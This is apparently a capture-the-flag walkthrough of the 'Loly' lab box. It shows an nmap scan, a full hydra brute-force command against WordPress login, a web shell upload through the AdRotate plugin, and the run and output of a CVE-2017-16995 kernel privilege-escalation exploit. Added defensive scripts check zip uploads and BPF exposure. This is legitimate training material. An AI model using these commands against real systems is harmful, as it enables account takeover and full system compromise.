
Enumeration
Nmap
Nmap scan report for 192.168.141.121
Host is up (0.67s latency).
Not shown: 64704 closed tcp ports (reset), 830 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.52 seconds
Raw packets sent: 67620 (2.975MB) | Rcvd: 70424 (3.830MB)
loly.lc has been identified as the hostname of the domain, so we add a hosts entry pairing the IP address with loly.lc.
Wpscan
We discover a username, loly. Heading to the wp-admin page, we attempt to find the password for loly.
Hydra – Brute Force Method 1
We use the following string to brute-force user Loly.
hydra -l loly -P /usr/share/wordlists/rockyou.txt loly.lc http-form-post "/wordpress/wp-login.php:log=loly&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Floly.lc%2Fwordpress%2Fwp-admin%2F&testcookie=1:Error: The password you entered for the username "
Wpscan Brute Force Method 2


Foothold
Inside WordPress we do not find the usual avenues of attack; instead we find a plugin called AdRotate.
In the plugin, we can upload a banner, which must be in zip format. However, you can't just rename a shell.php to shell.php.zip and upload it; the archive must be zipped correctly for it to work. I tried using the command line for this, but instead opted for a website to do it for me.

The file then correctly identifies as a zip archive.


With this zip file uploaded, we are able to curl the file and get onto the box as www-data.
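The foothold works because the banner upload accepts any archive and the web server later executes what was inside it. An upload handler that inspects the archive before extraction closes that door. The script below is an added example, not code from AdRotate or from the writeup; the sample archives are constructed in memory, and the allowed types and size limits are assumptions.

```python
import io
import posixpath
import zipfile

# Assumed policy for a banner upload: image files only, bounded size and member count.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".webp"}
# Leading bytes each allowed type must start with; the extension alone is not trusted.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".webp": (b"RIFF",),
}
MAX_MEMBER_BYTES = 5 * 1024 * 1024
MAX_MEMBERS = 50


def check_banner_zip(data: bytes):
    """Return a list of problems found in an uploaded banner archive; empty means accept."""
    problems = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive"]
    with zf:
        infos = zf.infolist()
        if len(infos) > MAX_MEMBERS:
            problems.append(f"too many members ({len(infos)})")
        for info in infos:
            name = info.filename
            norm = posixpath.normpath(name)
            # Reject absolute paths, backslash tricks and anything that walks upward.
            if name.startswith("/") or "\\" in name or norm == ".." or norm.startswith("../"):
                problems.append(f"{name}: path escapes the extraction directory")
                continue
            if info.is_dir():
                continue
            ext = posixpath.splitext(name)[1].lower()
            if ext not in ALLOWED_EXT:
                problems.append(f"{name}: extension {ext or '(none)'} not allowed")
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                problems.append(f"{name}: {info.file_size} bytes exceeds limit")
                continue
            with zf.open(info) as member:
                head = member.read(12)
            if not any(head.startswith(m) for m in MAGIC[ext]):
                problems.append(f"{name}: content does not match {ext} signature")
    return problems


def build_zip(members):
    """Constructed helper: build an in-memory zip from {name: bytes} for the samples below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample archives (not the files used in the writeup).
GOOD_BANNER = build_zip({"banner.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 64})
SCRIPT_IN_ZIP = build_zip({"shell.php": b"<?php /* constructed placeholder */ ?>"})
DISGUISED = build_zip({"banner.png": b"<?php /* constructed placeholder, not an image */ ?>"})
TRAVERSAL = build_zip({"../../outside.txt": b"constructed"})

if __name__ == "__main__":
    for label, archive in [("good", GOOD_BANNER), ("script", SCRIPT_IN_ZIP),
                           ("disguised", DISGUISED), ("traversal", TRAVERSAL)]:
        print(label, check_banner_zip(archive) or "accepted")
```

The signature check catches a renamed script, but not a polyglot that begins with a valid image header, so the second control that belongs alongside this one is serving the upload directory with script execution disabled in nginx (no PHP handler for that location). Path checks matter too: a member named ../../outside.txt would otherwise be written outside the banner directory.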

Running linpeas we discover a password in the WordPress database file.

Lateral Privesc
We are now user loly.
#NOTE: Running linpeas again, we identify a cron job running at 5am every day. Currently I've set up a listener and a shell in the home directory that could be executed by root at 5am. It is about 50 minutes from 5am on the machine. I will check whether a root shell comes through from the cron job.

Alternatively, using uname -a we find the kernel version in use.
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
We can then search for local privesc opportunities. We can find one here in Exploit-DB:
https://www.exploit-db.com/exploits/45010
and also in searchsploit here:

You can find a repository for kernel exploits here:
So there are a few places to find the privesc.
Root
We can get root by using the CVE-2017-16995 exploit. It behaves like this:
loly@ubuntu:/dev/shm$ gcc root.c -o root
loly@ubuntu:/dev/shm$ ./root
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035eadd00
[*] Leaking sock struct from ffff880035f3e3c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880034a8cb40
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880034a8cb40
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
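The exploit output above shows the kernel accepting a BPF program from an unprivileged user ("sneaking evil bpf past the verifier"), which is the entry point CVE-2017-16995 needs. For a defender the two questions are whether the running kernel predates the fix and whether unprivileged bpf() is reachable at all; the latter is governed by the sysctl kernel.unprivileged_bpf_disabled, present since Linux 4.4. The script below is an added example, not from the writeup: its inputs are constructed copies of what uname -r and sysctl print, and PATCHED_ABI_PLACEHOLDER is a placeholder threshold to be replaced with the build number from your distribution's advisory.

```python
import re

# Constructed sample inputs (not captured from the writeup's host): the output of
# `uname -r` and of `sysctl kernel.unprivileged_bpf_disabled`.
SAMPLE_UNAME_R = "4.4.0-31-generic"
SAMPLE_SYSCTL = "kernel.unprivileged_bpf_disabled = 0"

# PLACEHOLDER: the first kernel build of this series that carries the fix for
# CVE-2017-16995. Take the real value from your distribution's advisory; this
# tuple is an assumed threshold used only to make the example runnable.
PATCHED_ABI_PLACEHOLDER = (4, 4, 0, 999)


def parse_kernel_release(release):
    """Turn '4.4.0-31-generic' into (4, 4, 0, 31); the 4th field is the distro ABI build."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)(?:-(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch, abi = m.groups()
    return int(major), int(minor), int(patch), int(abi or 0)


def parse_sysctl_value(output):
    """Extract the integer from a 'key = value' sysctl line."""
    m = re.search(r"=\s*(\d+)\s*$", output.strip())
    if not m:
        raise ValueError(f"unrecognised sysctl output: {output!r}")
    return int(m.group(1))


def assess(uname_r, sysctl_output, patched_abi):
    """Combine the two signals into one verdict.

    kernel.unprivileged_bpf_disabled == 0 means any local user may load BPF
    programs; any non-zero value blocks unprivileged bpf(). A kernel build older
    than the patched one is only an exposure while that door is open.
    """
    release = parse_kernel_release(uname_r)
    unpriv_bpf_open = parse_sysctl_value(sysctl_output) == 0
    # Only builds of the same major.minor.patch series are compared; a different
    # series needs its own advisory threshold rather than a tuple comparison.
    kernel_unpatched = release[:3] == patched_abi[:3] and release < patched_abi
    return {
        "release": release,
        "kernel_unpatched": kernel_unpatched,
        "unprivileged_bpf_reachable": unpriv_bpf_open,
        "exposed": kernel_unpatched and unpriv_bpf_open,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_UNAME_R, SAMPLE_SYSCTL, PATCHED_ABI_PLACEHOLDER))
```

Updating the kernel is the fix; until that happens, `sysctl -w kernel.unprivileged_bpf_disabled=1` removes the unprivileged bpf() entry point the exploit relies on, and the script's "exposed" flag flips to False once that value is non-zero.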
Conclusion
When I first attempted this box, I did struggle a bit. But coming back to it, I needed help identifying a couple of approaches.
Curl is your best friend for analysing source code on the web. It is also a powerful tool for executing scripts.
When looking for kernel exploits, remember to search for local privilege escalation exploits as well as remote ones. Search both, not just one.